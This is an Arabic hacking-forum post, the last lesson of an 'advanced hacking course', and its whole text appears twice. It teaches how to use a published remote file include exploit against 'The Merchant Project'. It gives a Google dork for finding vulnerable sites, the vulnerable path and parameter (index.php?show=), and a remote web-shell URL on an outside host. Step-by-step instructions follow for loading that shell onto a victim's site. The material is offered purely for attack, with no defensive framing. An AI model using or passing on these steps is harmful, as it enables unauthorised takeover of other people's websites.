ASDELY-ScOrPiOn
06-12-2009, 04:53 PM
أخباركمـ
نكمل علي بركة الله
طبعا كلنا او البعض منا يعرف عن انواع من الثغرات
لكن ما يعرفها كلها
يعرف ان فيه فايل انكلود وسكيول انجاكشن وكوماند اكسزيشان ...
المهمـ حتي نقدر نفهمـ كويس نستغل اي ثغرة تقابلنا
بعض اللي اكتشفوا هذة الثغرات استعملوا لغات برمجيه مثا html ..... php .... perl
حتي يطبقون عن طريقها
بشرح اليومـ استغلال ثغرات <html>
اي ثغرة تلقي بأول الصفحه هذا الكود <html> تعرف انها ثغرة من نوع الهتمل
ولو درست لغة الات تي ام ال قبل كدا بتفهمـ كويس ؟
الثغرة الموجودة بالميلورمـ
http://www.milw0rm.com/exploits/3818 (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.milw0rm.com%2F exploits%2F3818)
راح اشرح التطبيق عليها ..
----------
<html>
بداية الصفحه
--------
Remote File Include Exploit
النوع
----
Script Name: 2005-2006 The Merchant Project
-----------
Dork : http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N
كود البحث
---------
------------
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
---------
var path="/help"
كود البحث
---------
------------
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
var path="/help"
مجلد المساعده يحمل الصفحه اللي بيها الثغرة
--------
var adres="/index.php?" //File name
الصفحة اللي فيها كود التغرة
--------
var acik ="show=" // Line x
متغير التغرة
--------
var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script
هنا نضع الشيل بين الاقواس
وللبحث عنوا كنترول f
ctrl+f = shll
----------
اوكـ ما فيه غموض
خطوات العمل
1- تاخد الكود الموجود بالصفحه وتحدد الكل وتنسخوا
http://www9.0zz0.com/2008/10/09/22/776956251.jpg
2- تغير رابط الشي الي رابط الشيل حقك
http://www10.0zz0.com/2008/10/09/22/160354734.jpg
3- تحفظوا بأمتداد html
http://www10.0zz0.com/2008/10/09/22/824594962.jpg
4- نفتح الصفحه بالمتصفح عادي ونضع رابط الموقع المصاب كما بالصورة
http://www10.0zz0.com/2008/10/09/22/212752198.jpg
واضغطـ اوكـ بيحملكـ الشيل بالصفحه ومبروك عليك
http://www10.0zz0.com/2008/10/09/23/726254247.jpg
------
وهكذا نكون قد أنهينا الدرس العاشر والأخير من دورة الهكر المتقدمة
آمل أن تكون قد أعجبتكم وأن تكونوا أستفدتم منها ولو بالقليل
بالتوفيق
نكمل علي بركة الله
طبعا كلنا او البعض منا يعرف عن انواع من الثغرات
لكن ما يعرفها كلها
يعرف ان فيه فايل انكلود وسكيول انجاكشن وكوماند اكسزيشان ...
المهمـ حتي نقدر نفهمـ كويس نستغل اي ثغرة تقابلنا
بعض اللي اكتشفوا هذة الثغرات استعملوا لغات برمجيه مثا html ..... php .... perl
حتي يطبقون عن طريقها
بشرح اليومـ استغلال ثغرات <html>
اي ثغرة تلقي بأول الصفحه هذا الكود <html> تعرف انها ثغرة من نوع الهتمل
ولو درست لغة الات تي ام ال قبل كدا بتفهمـ كويس ؟
الثغرة الموجودة بالميلورمـ
http://www.milw0rm.com/exploits/3818 (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.milw0rm.com%2F exploits%2F3818)
راح اشرح التطبيق عليها ..
----------
<html>
بداية الصفحه
--------
Remote File Include Exploit
النوع
----
Script Name: 2005-2006 The Merchant Project
-----------
Dork : http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N
كود البحث
---------
------------
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
---------
var path="/help"
كود البحث
---------
------------
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود
الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
var path="/help"
مجلد المساعده يحمل الصفحه اللي بيها الثغرة
--------
var adres="/index.php?" //File name
الصفحة اللي فيها كود التغرة
--------
var acik ="show=" // Line x
متغير التغرة
--------
var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script
هنا نضع الشيل بين الاقواس
وللبحث عنوا كنترول f
ctrl+f = shll
----------
اوكـ ما فيه غموض
خطوات العمل
1- تاخد الكود الموجود بالصفحه وتحدد الكل وتنسخوا
http://www9.0zz0.com/2008/10/09/22/776956251.jpg
2- تغير رابط الشي الي رابط الشيل حقك
http://www10.0zz0.com/2008/10/09/22/160354734.jpg
3- تحفظوا بأمتداد html
http://www10.0zz0.com/2008/10/09/22/824594962.jpg
4- نفتح الصفحه بالمتصفح عادي ونضع رابط الموقع المصاب كما بالصورة
http://www10.0zz0.com/2008/10/09/22/212752198.jpg
واضغطـ اوكـ بيحملكـ الشيل بالصفحه ومبروك عليك
http://www10.0zz0.com/2008/10/09/23/726254247.jpg
------
وهكذا نكون قد أنهينا الدرس العاشر والأخير من دورة الهكر المتقدمة
آمل أن تكون قد أعجبتكم وأن تكونوا أستفدتم منها ولو بالقليل
بالتوفيق